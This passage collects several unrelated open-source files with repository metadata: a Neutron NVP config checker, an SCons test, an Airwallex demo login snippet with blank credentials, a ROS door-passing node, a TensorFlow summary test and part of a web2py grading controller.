ret_gw_services = {"L2GatewayServiceConfig": [],
"L3GatewayServiceConfig": []}
gw_services = nvplib.get_gateway_services(cluster).get('results', [])
for gw_service in gw_services:
ret_gw_services[gw_service['type']].append(gw_service['uuid'])
return ret_gw_services
def get_transport_zones(cluster):
transport_zones = nvplib.get_transport_zones(cluster).get('results')
return [transport_zone['uuid'] for transport_zone in transport_zones]
def main(argv):
if len(argv) != 2:
help(argv[0])
args = ['--config-file']
args.append(argv[1])
config.parse(args)
print("----------------------- Database Options -----------------------")
print("\tconnection: %s" % cfg.CONF.database.connection)
print("\tretry_interval: %d" % cfg.CONF.database.retry_interval)
print("\tmax_retries: %d" % cfg.CONF.database.max_retries)
print("----------------------- NVP Options -----------------------")
print("\tNVP Generation Timeout %d" % cfg.CONF.NVP.nvp_gen_timeout)
print("\tNumber of concurrent connections to each controller %d" %
cfg.CONF.NVP.concurrent_connections)
print("\tmax_lp_per_bridged_ls: %s" % cfg.CONF.NVP.max_lp_per_bridged_ls)
print("\tmax_lp_per_overlay_ls: %s" % cfg.CONF.NVP.max_lp_per_overlay_ls)
print("----------------------- Cluster Options -----------------------")
print("\trequested_timeout: %s" % cfg.CONF.req_timeout)
print("\tretries: %s" % cfg.CONF.retries)
print("\tredirects: %s" % cfg.CONF.redirects)
print("\thttp_timeout: %s" % cfg.CONF.http_timeout)
cluster = NeutronPlugin.create_nvp_cluster(
cfg.CONF,
cfg.CONF.NVP.concurrent_connections,
cfg.CONF.NVP.nvp_gen_timeout)
num_controllers = len(cluster.nvp_controllers)
print("Number of controllers found: %s" % num_controllers)
if num_controllers == 0:
print("You must specify at least one controller!")
sys.exit(1)
for controller in cluster.nvp_controllers:
print("\tController endpoint: %s" % controller)
nvplib.check_cluster_connectivity(cluster)
gateway_services = get_gateway_services(cluster)
default_gateways = {
"L2GatewayServiceConfig": cfg.CONF.default_l2_gw_service_uuid,
"L3GatewayServiceConfig": cfg.CONF.default_l3_gw_service_uuid}
errors = 0
for svc_type in default_gateways.keys():
for uuid in gateway_services[svc_type]:
print("\t\tGateway(%s) uuid: %s" % (svc_type, uuid))
if (default_gateways[svc_type] and
default_gateways[svc_type] not in gateway_services[svc_type]):
print("\t\t\tError: specified default %s gateway (%s) is "
"missing from NVP Gateway Services!" % (svc_type,
default_gateways[svc_type]))
errors += 1
transport_zones = get_transport_zones(cluster)
print("\tTransport zones: %s" % transport_zones)
if cfg.CONF.default_tz_uuid not in transport_zones:
print("\t\tError: specified default transport zone "
"(%s) is missing from NVP transport zones!"
% cfg.CONF.default_tz_uuid)
errors += 1
if errors:
print("\nThere are %d errors with your configuration. "
" Please, revise!" % errors)
sys.exit(1)
else:
print("Done.")
| {
"content_hash": "20d8ec0b3aef5504ea657da9aa6222d1",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 77,
"avg_line_length": 40.85263157894737,
"alnum_prop": 0.6104096882246843,
"repo_name": "netscaler/neutron",
"id": "092dfba326028d65d9371e29e696db81db42a538",
"size": "4588",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/plugins/nicira/check_nvp_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6924102"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify the obj --stage option.
"""
import TestSCons_time
test = TestSCons_time.TestSCons_time()
test.fake_logfile('foo-000-0.log', 0)
test.fake_logfile('foo-000-1.log', 0)
test.fake_logfile('foo-000-2.log', 0)
test.fake_logfile('foo-001-0.log', 1)
test.fake_logfile('foo-001-1.log', 1)
test.fake_logfile('foo-001-2.log', 1)
expect = """\
set key bottom left
plot '-' title "Startup" with lines lt 1, \\
'-' title "Full build" with lines lt 2, \\
'-' title "Up-to-date build" with lines lt 3
# Startup
0 50%(index)s0.000
1 50%(index)s1.000
e
# Full build
0 50%(index)s0.000
1 50%(index)s1.000
e
# Up-to-date build
0 50%(index)s0.000
1 50%(index)s1.000
e
"""
pre_read = expect % {'index' : 1}
post_read = expect % {'index' : 2}
pre_build = expect % {'index' : 3}
post_build = expect % {'index' : 4}
test.run(arguments = 'obj --fmt gnuplot --stage pre-read Action.ListAction',
stdout=pre_read)
test.run(arguments = 'obj --fmt gnuplot --stage=post-read Action.ListAction',
stdout=post_read)
test.run(arguments = 'obj --fmt gnuplot --stage=pre-build Action.ListAction',
stdout=pre_build)
test.run(arguments = 'obj --fmt gnuplot --stage post-build Action.ListAction',
stdout=post_build)
expect = """\
scons-time: obj: Unrecognized stage "unknown".
Type "scons-time help obj" for help.
"""
test.run(arguments = 'obj --fmt gnuplot --stage unknown',
status = 1,
stderr = expect)
test.pass_test()
| {
"content_hash": "2596871afd6806ec6500a0011c8ee258",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 78,
"avg_line_length": 24.1875,
"alnum_prop": 0.6369509043927648,
"repo_name": "datalogics/scons",
"id": "5dbd15b98432d7f31e159eac54e98d747f1b3214",
"size": "2650",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/scons-time/obj/stage.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1519"
},
{
"name": "HTML",
"bytes": "43855"
},
{
"name": "Perl",
"bytes": "23384"
},
{
"name": "Python",
"bytes": "4756209"
},
{
"name": "Shell",
"bytes": "13866"
}
],
"symlink_target": ""
} |
import http.client
conn = http.client.HTTPSConnection("api-demo.airwallex.com", 443, timeout=10)
payload = "{}"
headers = {
"Content-Type": "application/json",
"x-api-key": "",
"x-client-id": ""
}
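# NOTE (added for clarity): the x-api-key and x-client-id values above are left
# blank on purpose; fill them in with your own demo credentials, otherwise the
# login request below will presumably be rejected.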
conn.request("POST", "/api/v1/authentication/login", payload, headers)
res = conn.getresponse()
data = res.read()
print(data.decode("utf-8"))
| {
"content_hash": "efae579fc8a1aa87402e6bcc2d668fc7",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 77,
"avg_line_length": 19.444444444444443,
"alnum_prop": 0.6657142857142857,
"repo_name": "SpAiNiOr/mystudy",
"id": "6c2bfe68d4cdfb8465cd451de08068bcbf579a38",
"size": "350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Work/AWX/auth.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "13"
},
{
"name": "Dockerfile",
"bytes": "447"
},
{
"name": "Java",
"bytes": "2439"
},
{
"name": "JavaScript",
"bytes": "1422"
},
{
"name": "Python",
"bytes": "12215"
}
],
"symlink_target": ""
} |
import rospy
import actionlib
from actionlib_msgs.msg import GoalStatusArray, GoalStatus
from move_base_msgs.msg import MoveBaseAction
from door_pass.door_utils import DoorUtils
class DoorPass(object):
def __init__(self):
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
self.log_checks = rospy.get_param("~log_checks", False)
n_closed_door = rospy.get_param("~n_closed_door", 20)
self.door_utils=DoorUtils(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door = n_closed_door,
consecutive_open_secs = 0)
self.mon_nav_status_sub=rospy.Subscriber("/monitored_navigation/status", GoalStatusArray, self.mon_nav_status_cb)
self.door_as=actionlib.SimpleActionServer('doorPassing', MoveBaseAction, execute_cb = self.execute_cb, auto_start=False)
self.door_as.start()
self.door_as.register_preempt_callback(self.door_as_preempt_cb)
self.mon_nav_executing=False
def mon_nav_status_cb(self, data):
result=False
for goal in data.status_list:
if goal.status==GoalStatus.ACTIVE:
result=True
break
self.mon_nav_executing=result
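# Illustrative note (not part of the original node): mon_nav_status_cb keeps
# self.mon_nav_executing True while any monitored_navigation goal is ACTIVE;
# execute_cb uses that flag below to wait (up to roughly 3 seconds) before
# re-enabling the recovery behaviours it disabled for a closed door.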
def execute_cb(self, goal):
self.door_utils.activate()
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
n_closed_door = rospy.get_param("~n_closed_door", 20)
self.door_utils.set_params(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door = n_closed_door)
target_pose=goal.target_pose.pose
rospy.loginfo("Door pass action server calling rotate towards pose")
self.door_utils.rotate_towards_pose(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
rospy.loginfo("Door pass action server calling check door")
door_open=self.door_utils.check_door(target_pose, log_to_mongo = self.log_checks)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if door_open:
rospy.loginfo("The door is open. Door pass action server is calling pass door")
success=self.door_utils.pass_door(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if success:
self.finish_execution(GoalStatus.SUCCEEDED)
return
else:
self.finish_execution(GoalStatus.ABORTED)
return
else:
rospy.loginfo("Door is closed. Disabling monitored navigation recoveries.")
current_mon_nav_recover_states=rospy.get_param("/monitored_navigation/recover_states/", {})
for mon_nav_recover_state in current_mon_nav_recover_states:
rospy.set_param("/monitored_navigation/recover_states/" + mon_nav_recover_state, [False,0])
self.finish_execution(GoalStatus.ABORTED)
# Wait for monitored navigation to report the failure, then restore the recovery states.
timeout=0
while self.mon_nav_executing and not self.door_as.is_preempt_requested() and timeout<30:
rospy.loginfo("Waiting for monitored navigation to stop executing")
rospy.sleep(0.1)
timeout=timeout+1
rospy.loginfo("Monitored navigation stopped executing. Resetting monitored navigation recoveries.")
rospy.set_param("/monitored_navigation/recover_states/", current_mon_nav_recover_states)
return
def finish_execution(self, status):
rospy.loginfo("Door passing finished with outcome " + GoalStatus.to_string(status))
self.door_utils.deactivate()
if status==GoalStatus.SUCCEEDED:
self.door_as.set_succeeded()
if status==GoalStatus.ABORTED:
self.door_as.set_aborted()
if status==GoalStatus.PREEMPTED:
self.door_as.set_preempted()
def door_as_preempt_cb(self):
self.door_utils.deactivate()
def main(self):
rospy.spin()
if __name__ == '__main__':
rospy.init_node("door_pass_node")
passer=DoorPass()
passer.main()
| {
"content_hash": "dd83150be5d799a18a1422ed46fa50bd",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 129,
"avg_line_length": 46.46825396825397,
"alnum_prop": 0.5940222032450897,
"repo_name": "strands-project/strands_apps",
"id": "977c00b56cd78d8e8ae76210390925da60440ca1",
"size": "5879",
"binary": false,
"copies": "2",
"ref": "refs/heads/indigo-devel",
"path": "door_pass/scripts/door_passing.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "32677"
},
{
"name": "CMake",
"bytes": "24963"
},
{
"name": "Python",
"bytes": "122957"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
} |
"""Tests for V2 summary ops from summary_ops_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.util import event_pb2
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine.sequential import Sequential
from tensorflow.python.keras.engine.training import Model
from tensorflow.python.keras.layers.core import Activation
from tensorflow.python.keras.layers.core import Dense
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import summary_ops_v2 as summary_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
class SummaryOpsTest(test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
summary_ops.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = summary_ops.create_file_writer(logdir)
with writer.as_default():
summary_ops.keras_model(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
summary_ops.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
summary_ops.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with test.mock.patch.object(logging, 'warn') as mock_log:
self.assertFalse(
summary_ops.keras_model(name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = Sequential()
with test.mock.patch.object(model, 'to_json') as mock_to_json:
with test.mock.patch.object(logging, 'warn') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
summary_ops.keras_model(name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring... oops')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
records = list(tf_record.tf_record_iterator(filepath))
result = []
for r in records:
event = event_pb2.Event()
event.ParseFromString(r)
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert gfile.Exists(logdir)
files = gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
test.main()
| {
"content_hash": "0a1da881bcc5f4ff831785fdd8361cca",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 78,
"avg_line_length": 31.646616541353385,
"alnum_prop": 0.6851983844143502,
"repo_name": "aldian/tensorflow",
"id": "7d9a89ec60c31fdd499fb1527bb8bb4f26fea7c9",
"size": "4898",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/tests/summary_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8458"
},
{
"name": "C",
"bytes": "201402"
},
{
"name": "C++",
"bytes": "29667924"
},
{
"name": "CMake",
"bytes": "647100"
},
{
"name": "Go",
"bytes": "976514"
},
{
"name": "Java",
"bytes": "412117"
},
{
"name": "Jupyter Notebook",
"bytes": "1833675"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "38128"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Perl",
"bytes": "6715"
},
{
"name": "Protocol Buffer",
"bytes": "275733"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "26424665"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "373109"
}
],
"symlink_target": ""
} |
import access
import util
from datetime import datetime
import numpy as np
import gluon.contrib.simplejson as simplejson
@auth.requires_login()
def view_submissions():
"""This function enables the view of the ranking of items submitted to a
venue. It is assumed that the people accessing this can have full
information about the venue, including the identity of the submitters."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_submissions(c, props):
session.flash = T('You do not have access to the submissions of this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Prepares the query for the grid.
q = (db.submission.venue_id == c.id)
db.submission.quality.readable = False
db.submission.error.readable = False
db.submission.content.readable = False
db.submission.content.writable = False
db.submission.comment.writable = False
db.submission.n_assigned_reviews.readable = True
db.submission.n_assigned_reviews.label = T('Reviews Assigned')
db.submission.n_completed_reviews.label = T('Done')
db.submission.n_rejected_reviews.label = T('Declined')
if c.allow_link_submission:
db.submission.link.readable = True
# Sets the fields.
fields=[db.submission.user, db.submission.percentile,
db.submission.n_assigned_reviews, db.submission.n_completed_reviews,
db.submission.n_rejected_reviews]
# Sets the link to view/edit the feedback.
links=[]
if access.can_view_feedback(c, props):
links.append(dict(header=T('Feedback'),
body = lambda r: A(T('View'), _class='btn',
_href=URL('feedback', 'view_feedback', args=['s', r.id]))))
grid = SQLFORM.grid(q,
field_id=db.submission.id,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False,
deletable=False,
fields=fields,
links=links,
links_placement='left',
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(title=title, grid=grid)
def get_num_reviews(subm_id, venue_id):
"""This function is used to heal old databases, and produce the count
of completed reviews for each submission.
In future releases, this is computed automatically by the review function."""
# Tries to answer fast.
subm = db.submission(subm_id)
if subm.n_completed_reviews is not None:
return subm.n_completed_reviews
# Computes the number of reviews for each item.
n = db((db.task.venue_id == venue_id) &
(db.task.submission_id == subm.id) &
(db.task.completed_date < datetime.utcnow())).count()
# Stores it in the submission.
subm.n_completed_reviews = n
subm.update_record()
db.commit()
return n
@auth.requires_login()
def view_raters():
"""This function shows the contribution of each user to the total ranking of a venue."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_rating_contributions(c, props):
session.flash = T('You do not have access to the rater contributions for this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Prepares the query for the grid.
q = (db.grades.venue_id == c.id)
grid = SQLFORM.grid(q,
args=request.args[:1],
user_signature=False, details=True,
create=False, editable=False, deletable=False,
fields=[db.grades.user, db.grades.accuracy,
db.grades.reputation, db.grades.n_ratings],
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(grid=grid, title=title)
def short_float_or_None(val):
if val is None:
return None
return float("%.3f" % val)
@auth.requires_login()
def view_grades():
"""This function shows the final grade of each user.
It takes as single argument the venue id.
"""
# This function is used to get experimental grades from the db.
def get_grade_fn(venue_id, run_id):
def f(row):
row = db((db.grades_exp.venue_id == venue_id) &
(db.grades_exp.user == row.user) &
(db.grades_exp.run_id == run_id)).select().first()
if row is None:
return 'None'
# Generates a string summary.
s = "subm_grade: %r subm_confidence: %r rev: %r rep: %r tot: %r" % (
short_float_or_None(row.subm_grade),
short_float_or_None(row.subm_confidence),
short_float_or_None(row.review_grade),
short_float_or_None(row.reputation),
short_float_or_None(row.grade))
return s
return f
# Main function.
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_ratings(c, props):
session.flash = T('You do not have access to the final grades for this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Checking that final grades are recent and don't need recomputation.
venue_row = db(db.venue.id == c.id).select().first()
grades_date = venue_row.latest_grades_date
if grades_date is None:
session.flash = T('The crowd-grades have not been computed yet.')
redirect(URL('rating', 'crowd_grade', args=[c.id]))
# The crowd-grades have been computed already.
if is_user_admin():
db.grades.reputation.readable = True
db.grades.user.represent = represent_user_by_submission_feedback
db.grades.venue_id.readable = False
# Prepares the buttons at the top.
link_list = []
if access.can_manage(c, props):
db.grades.assigned_grade.writable = True
db.grades.assigned_grade.comment = T('Assign the desired grade to a few users, '
'then automatically fill-in the remaining '
'grades via interpolation. ')
is_editable = True
link_list.append(A(T('Recompute crowd-grades'), _href=URL('rating', 'crowd_grade', args=[c.id])))
link_list.append(A(T('Interpolate final grades'),
_href=URL('ranking', 'interpolate_grades', args=[c.id], user_signature=True)))
link_list.append(A(T('Clear final grades'),
_href=URL('ranking', 'reset_grades', args=[c.id], user_signature=True)))
# Creates button to release / withdraw grades.
if c.grades_released:
link_list.append(A(T('Hide grades from students'),
_href=URL('ranking', 'release_grades', args=[c.id, 'False'], user_signature=True)))
else:
link_list.append(A(T('Show grades to students'),
_href=URL('ranking', 'release_grades', args=[c.id, 'True'], user_signature=True)))
else:
db.grades.assigned_grade.writable = False
is_editable = False
# If one is the manager, and we are viewing experimental grades, offers the option
# to download a spreadsheet including the experimental grades.
if is_user_admin():
link_list.append(A(T('View experimental runs'),
_href=URL('ranking', 'view_exp_grades', args=[c.id])))
if is_user_admin() and request.vars.run_ids is not None:
link_list.append(A(T('Download research data'),
_href=URL('research', 'download_research_data.csv', args=[c.id],
vars=dict(run_ids=request.vars.run_ids),
user_signature=True)))
if is_user_admin():
link_list.append(A(T('Evaluate grades'),
_href=URL('research', 'evaluate_grades', args=[c.id],
user_signature=True)))
link_list.append(A(T('Rerun evaluations'),
_href=URL('research', 'rerun_evaluations', args=[c.id],
user_signature=True)))
# Chooses the display fields.
display_fields = [
db.grades.user, db.grades.venue_id,
db.grades.submission_grade, db.grades.submission_percentile,
db.grades.accuracy, db.grades.n_ratings,
db.grades.grade, db.grades.percentile,
db.grades.assigned_grade]
if is_user_admin():
display_fields.append(db.grades.reputation)
display_fields.append(db.grades.submission_control_grade)
db.grades.submission_control_grade.readable = True
# Adds columns for any extra grade we wish to see.
grid_links = []
if is_user_admin() and request.vars.run_ids is not None:
run_ids = request.vars.run_ids.split(',')
for r in run_ids:
grid_links.append(dict(
header = r,
body = get_grade_fn(c.id, r)))
if is_user_admin():
# Adds a column for the true grade.
grid_links.append(dict(
header = '',
body = lambda row: A(T('Enter control grade'), _class='btn',
_href=URL('ranking', 'edit_control_grade', args=[c.id, row.user], user_signature=True))))
# Prepares the grid.
q = (db.grades.venue_id == c.id)
grid = SQLFORM.grid(q,
fields=display_fields,
args=request.args[:1],
user_signature=False, details=False,
create=False, editable=is_editable, deletable=False,
links=grid_links,
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
grades_date_info = represent_date(c.latest_grades_date, c)
if c.grades_released:
grades_visibility = T('Grades are visible to students')
else:
grades_visibility = T('Grades are not visible to students')
return dict(grid=grid, title=title, link_list=link_list,
grades_date_info=grades_date_info, grades_visibility=grades_visibility)
@auth.requires_signature()
def edit_control_grade():
"""Allows admins to edit the control grade. Arguments:
venue id, user."""
if not is_user_admin():
session.flash = T('Not Authorized.')
redirect(URL('default', 'index'))
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
# props = db(db.user_properties.user == get_user_email()).select().first()
# No modifications to any assigned grade.
db.grades.assigned_grade.writable = False
db.grades.submission_control_grade.readable = db.grades.submission_control_grade.writable = True
row = db((db.grades.venue_id == c.id) & (db.grades.user == request.args(1))).select().first()
if row is None:
session.flash = T('No record found for the given user.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
form = SQLFORM(db.grades, record=row)
if form.process().accepted:
session.flash = T('The control grade has been inserted.')
if request.env.http_referrer:
redirect(request.env.http_referrer)
else:
redirect(URL('ranking', 'view_grades', args=[c.id]))
# Generates a link to view the submission.
subm_link = A(T('View submission'), _class='btn',
_href=URL('feedback', 'view_feedback', args=['u', c.id, row.user]))
return dict(form=form, subm_link=subm_link)
@auth.requires_signature()
def release_grades():
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
visible = (request.args(1) == 'True')
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
db(db.venue.id == c.id).update(grades_released = visible)
db.commit()
if visible:
session.flash = T('The grades are now visible to students.')
else:
session.flash = T('The grades are no longer visible to students.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
@auth.requires_signature()
def reset_grades():
"""This function resets the final grades to None."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
db(db.grades.venue_id == c.id).update(assigned_grade = None)
db.commit()
session.flash = T('The grades have been cleared.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
@auth.requires_signature()
def interpolate_grades():
"""This function interpolates the specified final grades."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
grades = db(db.grades.venue_id == c.id).select(db.grades.id, db.grades.grade, db.grades.assigned_grade, orderby=db.grades.percentile).as_list()
if len(grades) == 0:
return
# Fixes the lower end.
last_assigned_idx = 0
last_assigned_crowd_grade = util.get_or_0(grades[0], 'grade')
if grades[0]['assigned_grade'] is None:
last_assigned_grade = 0.0
db(db.grades.id == grades[0]['id']).update(assigned_grade = 0.0)
else:
last_assigned_grade = grades[0]['assigned_grade']
# Interpolates the rest.
for i, g in enumerate(grades):
assigned_grade = g['assigned_grade']
if assigned_grade is not None:
# Interpolates from previous to this one.
end_crowd_grade = util.get_or_0(g, 'grade')
for k in range(last_assigned_idx + 1, i):
crowd_grade = util.get_or_0(grades[k], 'grade')
if end_crowd_grade == last_assigned_crowd_grade:
new_grade = end_crowd_grade
else:
new_grade = (last_assigned_grade + (assigned_grade - last_assigned_grade) *
(crowd_grade - last_assigned_crowd_grade) /
(end_crowd_grade - last_assigned_crowd_grade))
db(db.grades.id == grades[k]['id']).update(assigned_grade = new_grade)
last_assigned_idx = i
last_assigned_grade = assigned_grade
last_assigned_crowd_grade = end_crowd_grade
db.commit()
session.flash = T('The grades have been interpolated.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
def represent_task_name_view_feedback(v, r):
return A(T('View submission'), _class='btn', _href=URL('feedback', 'view_feedback', args=['s', r.submission_id]))
@auth.requires_login()
def view_comparison():
"""This function displays an individual task."""
# We are given the task id.
t = db.task(request.args(0)) or redirect(URL('default', 'index'))
rating_user = t.user
submission_id = t.submission_id
# We need to get the most recent comparison by the user who has done this task.
comp = db((db.comparison.venue_id == t.venue_id) &
(db.comparison.user == t.user)).select(orderby=~db.comparison.date).first()
c = db.venue(t.venue_id) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
subm = db.submission(submission_id)
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
db.comparison.id.readable = False
db.comparison.ordering.readable = False
db.comparison.grades.represent = represent_grades
db.comparison.date.readable = False
db.comparison.is_valid.readable = False
db.task.user.readable = True
db.task.user.label = T('Reviewer')
db.task.user.represent = lambda v, r: A(v, _href=URL('feedback', 'view_feedback', args=['u', c.id, v]))
db.task.venue_id.readable = True
db.task.venue_id.represent = represent_venue_id
db.task.comments.readable = True
db.task.is_completed.readable = True
db.task.rejected.readable = True
db.task.helpfulness.readable = True
db.task.feedback.readable = True
db.comparison.venue_id.readable = (t is None)
db.comparison.venue_id.represent = represent_venue_id
db.comparison.user.readable = (comp is None)
db.comparison.user.label = T('Reviewer')
if comp is None:
comp_form = T('No corresponding comparison found.')
else:
comp_form = SQLFORM(db.comparison, record=comp, readonly=True)
task_form = SQLFORM(db.task, record=t, readonly=True)
return dict(comp_form=comp_form, task_form=task_form, user=rating_user, subm_id=submission_id,
subm=subm)
@auth.requires_login()
def view_comparisons_index():
"""This function displays all comparisons for a venue."""
props = db(db.user_properties.user == get_user_email()).select().first()
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
q = ((db.comparison.venue_id == c.id) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.user.represent = represent_user_by_submission_feedback
db.comparison.venue_id.readable = False
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id, db.comparison.grades,
db.comparison.submission_nicknames, db.comparison.is_valid, db.comparison.date,]
q = (db.comparison.venue_id == c.id)
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
title = T('Comparisons for venue ' + c.name)
return dict(title=title, grid=grid)
@auth.requires_login()
def view_comparisons_given_submission():
"""This function displays comparisons wich contains given submission."""
props = db(db.user_properties.user == get_user_email()).select().first()
subm = db.submission(request.args(0)) or redirect(URL('default', 'index'))
c = db.venue(subm.venue_id) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
# Create query.
# First, determine the people who have reviewed this submission.
reviewers_r = db(db.task.submission_id == subm.id).select(db.task.user).as_list()
reviewers = [x['user'] for x in reviewers_r]
